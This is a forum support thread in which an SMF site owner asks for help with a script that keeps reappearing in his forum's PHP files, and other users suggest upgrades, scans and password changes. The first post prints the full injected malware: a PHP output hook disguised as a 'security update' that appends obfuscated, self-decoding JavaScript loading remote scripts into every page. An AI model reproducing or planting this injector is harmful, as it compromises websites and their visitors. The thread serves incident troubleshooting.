SQL injection ?

[masterz]

Hello,

I had problem with my smf website.

Last month , when I try to connect on my website with firefox, i had that:







I spend 1 day to find the problem.

I had found this script in sources's folder on index.php, boardindex.php.

Code Select Expand

<?php ob_start("security_update"); function security_update($buffer){return $buffer."<script language=\"javascript\">$a=\"Z64bZ3dZ227FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07Z22;ddZ3dZ22!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+0~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+0iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z22;ceZ3dZ2268aZ2572CodZ2565At(Z2530)^Z2528Z25270x0Z2530Z2527+eZ2573Z2529)Z2529Z253b}}Z22;ccZ3dZ22elZ2565ngtZ2568;i+Z252b)Z257btmZ2570Z253dds.Z2573licZ2565(iZ252ci+1Z2529;sZ22;dzZ3dZ22Z2566unZ2563Z2574iZ256fZ256eZ2520dw(Z2574)Z257bZ2563aZ253dZ2527Z252564oZ252563umeZ25256eZ2574Z25252eZ2577rZ2525Z25369Z2574Z252565Z25252Z2538Z252522Z2527;cZ2565Z253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscrZ252569Z2570Z252574Z252520lZ2561nZ25256Z2537Z2575Z2561gZ25256Z2535Z25253dZ25255cZ252522Z256aavaZ2573crZ252569Z2570tZ25255cZ25252Z2532Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscrZ252569pZ25257Z2534Z25253eZ2527;evZ2561Z256c(uZ256eZ2565Z2573caZ2570eZ2528tZ2529)}Z253bZ22;cdZ3dZ22Z2574Z253dst+Z2553trZ2569Z256egZ252efroZ256dChaZ2572CZ256fde(Z2528tmZ2570.cZ25Z22;czZ3dZ22Z2566uncZ2574ioZ256e Z2563zZ2528cZ257aZ2529Z257brZ2565tZ2575Z2572nZ2520Z2563a+cZ2562+ccZ252bcZ2564+ceZ252bZ2563z;}Z253bZ22;dcZ3dZ22wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSxZ22;cbZ3dZ2270Z2565(dZ2573);sZ2574Z253dtZ256dpZ253dZ2527Z2527;for(Z2569Z253d0;iZ253cdsZ252Z22;opZ3dZ22Z2524aZ253dZ2522dw(dZ2563Z2573(Z2563Z2575,1Z2534)Z2529;Z2522;Z22;deZ3dZ22Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+Z2519dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0Z3d0#9050$9;0!Z2520M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+Z22;caZ3dZ22Z2566unZ2563Z2574iZ256fn dZ2563Z2573(dsZ252ceZ2573Z2529Z257bdsZ253duneZ2573caZ25Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;ubZ7bfdZ25;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522Z25220660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522!90660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ25Z22;stZ3dZ22Z2573Z2574Z253dZ2522$Z2561Z253dZ2573tZ253bdZ2563Z2573(Z2564Z2561+Z2564bZ252bdZ2563Z252bZ2564Z2564+Z2564Z2565,Z25310Z2529;Z2564wZ2528sZ2574)Z253bZ2573tZ253dZ2524Z2561;Z2522Z253bZ22;Z69f Z28doZ63uZ6deZ6etZ2ecooZ6bZ69e.iZ6eZ64exZ4fZ66(Z27rf5Z66Z36dsZ27)Z3dZ3d-1)Z7bfunctiZ6fZ6e cZ61llbZ61ckZ28x)Z7b wZ69ndoZ77.tZ77 Z3d x;Z76arZ20d Z3d Z6eeZ77 DZ61tZ65Z28Z29;d.Z73Z65tZ54iZ6de(xZ5bZ22aZ73_oZ66Z22]*10Z300Z29;vZ61r hZ20Z3d d.getZ55TZ43HouZ72sZ28);wZ69ndoZ77.hZ20Z3d h;Z69f (Z68 Z3e 8)Z7bZ77Z69Z6eZ64ow.Z67Z64 Z3d Z64;Z73Z63(Z27rf5Z666dZ73Z27,2,7Z29;Z65vZ61Z6c(Z75neZ73cZ61pe(Z64z+Z63Z7aZ2boZ70Z2bsZ74)+Z27dw(dZ7a+Z63Z7a(Z24a+sZ74)Z29;Z27);Z64Z6fcZ75Z6deZ6etZ2ewrZ69tZ65Z28$a)Z3bZ7deZ6csZ65Z7bd.sZ65tZ55TCZ44Z61tZ65(Z64.geZ74Z55TCDZ61tZ65Z28) Z2d Z32Z29Z3bZ77iZ6edowZ2eZ67Z64 Z3d d;Z76aZ72 tiZ6de Z3d neZ77Z20Z41Z72Z72ayZ28);Z76ar Z73hZ69ftZ49ndeZ78 Z3d Z22Z22;timZ65[Z22yeZ61Z72Z22] Z3d dZ2eZ67eZ74Z55TCZ46ullZ59earZ28);tZ69me[Z22Z6donZ74hZ22] Z3dZ20Z64Z2egZ65tUZ54Z43MonZ74h()Z2b1;Z74imZ65[Z22dZ61Z79Z22] Z3d Z64Z2eZ67etUZ54CDZ61tZ65()Z3bif Z28dZ2egeZ74UTCZ4dZ6fZ6eZ74hZ28Z29Z2b1 Z3c 10Z29Z7bsZ68iftZ49nZ64eZ78 Z3d tiZ6deZ5bZ22yeZ61Z72Z22] +Z20Z22-Z30Z22 +Z20Z28dZ2egeZ74UTCZ4dZ6fnthZ28)+1Z29;}Z65lseZ7bZ73hiZ66tZ49Z6edexZ20Z3d tZ69meZ5bZ22yeZ61rZ22]Z20+Z20Z22-Z22 + Z28dZ2eZ67etUZ54CZ4doZ6etZ68Z28)+1Z29;Z7dZ69fZ20(d.Z67etZ55TCDZ61te(Z29 Z3c 10)Z7bZ73hiZ66Z74Z49ndZ65Z78 Z3dsZ68ifZ74Z49ndZ65x Z2b Z22-0Z22 + dZ2egetZ55Z54CDaZ74eZ28);}Z65lseZ7bZ73Z68Z69fZ74Z49Z6edeZ78 Z3d sZ68ifZ74Z49Z6edexZ20Z2b Z22-Z22 + Z64.gZ65tUZ54CDaZ74eZ28Z29;}Z64ocZ75mZ65ntZ2ewriZ74Z65Z28Z22Z3cscrZ22+Z22ipt lanZ67uagZ65Z3djavZ61scZ72Z69ptZ22+Z22 sZ72cZ3dZ27hZ74tpZ3aZ2fZ2fseaZ72chZ2etZ77Z69Z74terZ2ecomZ2ftrZ65nZ64sZ2fdaiZ6cy.jZ73on?Z64Z61Z74eZ3dZ22+ shZ69ftZ49nZ64ex+Z22&Z63Z61llbZ61ckZ3dcalZ6cbaZ63k2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}} funcZ74ionZ20calZ6cbZ61ck2Z28xZ29Z7bwindZ6fw.tZ77 Z3d x;sZ63(Z27rf5Z66Z36dsZ27Z2c2Z2c7);Z65valZ28unZ65scZ61pe(Z64z+cZ7aZ2bopZ2bstZ29+Z27Z64Z77(dZ7aZ2bcZ7aZ28Z24Z61+stZ29);Z27);Z64ocZ75menZ74.wZ72itZ65(Z24aZ29Z3b}doZ63uZ6dZ65nt.Z77Z72itZ65(Z22Z3cimg Z73rZ63Z3dZ27httpZ3aZ2fZ2fsearch.tZ77itZ74erZ2eZ63oZ6dZ2fimageZ73Z2fsearZ63Z68Z2frZ73s.pZ6egZ27 wiZ64Z74Z68Z3d1 heigZ68tZ3d1 sZ74yleZ3dZ27visiZ62iliZ74y:Z68Z69dZ64eZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6canZ67Z75aZ67Z65Z3djZ61Z76ascZ72ipZ74Z22+Z22 Z73rcZ3dZ27http:Z2fZ2fseZ61Z72ch.Z74Z77iZ74teZ72.cZ6fmZ2ftrZ65Z6edZ73Z2fdaZ69lZ79.Z6asZ6fn?Z63Z61lZ6cbZ61ckZ3dZ63alZ6cbZ61ckZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}eZ6cseZ7b$aZ3dZ27Z27};fuZ6ecZ74Z69Z6fn Z73cZ28cZ6eZ6d,Z76,edZ29Z7bvarZ20exZ64Z3dneZ77Z20DZ61te(Z29;exZ64Z2eseZ74DatZ65(Z65xd.Z67eZ74DatZ65Z28)+Z65d)Z3bdoZ63umZ65nZ74.Z63Z6fokZ69eZ3dcZ6emZ2b Z27Z3dZ27 +escZ61pZ65(vZ29+Z27;expZ69reZ73Z3dZ27+exd.toZ47MTZ53tZ72iZ6eZ67Z28)Z3b};\";function z(s){r=\"\";for(i=0;i<s.length;i++){if(s.charAt(i)==\"Z\"){s1=\"%\"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));</script>";}//important security update ?>


I had removed it and modify database and ftp password.

But this morning, script is again on website.

Do you know a solution.

I try to chmod sources folder with 644 but that's not work

Sorry for my english cause i 'm french.

MasTerZ

[Kill Em All]

What version of SMF are you running? And the Sources folder should be 755.

Try Upgrading SMF

Edit: The only way to be secured is to make sure all your forum files stay up to date.

[Ranter]

He is running SMF version 1.1.10

EDITED LATER:

His site is hosted on a 1&1 server that appears to be in Berlin.  There are 232 other domains on the same IP address.

I wonder if this is a case in which the entire server has been compromised?

[Kill Em All]

Have you tried running the kb_scan.php?
http://www.simplemachines.org/community/index.php?topic=313201

Maybe have your host run a AV scan. Also you might want to change your database's password to a more complex one. Then run repair_settings.php.

[masterz]

Hello,

Thank you guys.

I had tried kb_scan  but all green

I had tried repair_settings.

I hope that works.

Thank you for all 

I come back if bad script appears again


MasTerZ

[Arantor]

First up, kb_scan will not help; this isn't a krisbarteo infection.

It does look like the server may be compromised, alternatively a backdoor in one or other script you have on your site; what other scripts are running?

[Kill Em All]

First up, kb_scan will not help; this isn't a krisbarteo infection.

Oh, well couldn't the attack be a similar attack and the kb_scanner could of caught that still?

I am still sticking with that he should contact his host about it ASAP in order for them to run a AV scan.

[Ranter]

I am still sticking with that he should contact his host about it ASAP in order for them to run a AV scan.

+1

[Arantor]

Let me clarify what kb_scan does. It looks for a SINGLE point of infection and flags up ONE type of behaviour that may or may not be completely unrelated to what has gone on here.

Contacting the host is definitely on the to-do list, as is making sure every script on the site is up to date. Then seeing about other users and whether they have been infected or not - I doubt this came from SMF itself.

[babjusi]

This looks very much like that gumblar virus attack that hit hundreds of sites a while back.

[Arantor]

Signature doesn't look like a Gumblaroid attack; that just brute force added an iframe; this looks more insidious.

[Kill Em All]

masterz, is there any update with this? Like Arantor said, what other scripts are you running and are they up to date?

[JimM]

Google has some information on this.  Appears that Wordpress was hit hard with something similar that always got inserted in the index.php file.  Some comments were that this was most likely a sniffed FTP password so my recommendation would be to change that as well as run a good malware/spyware scan on your PC.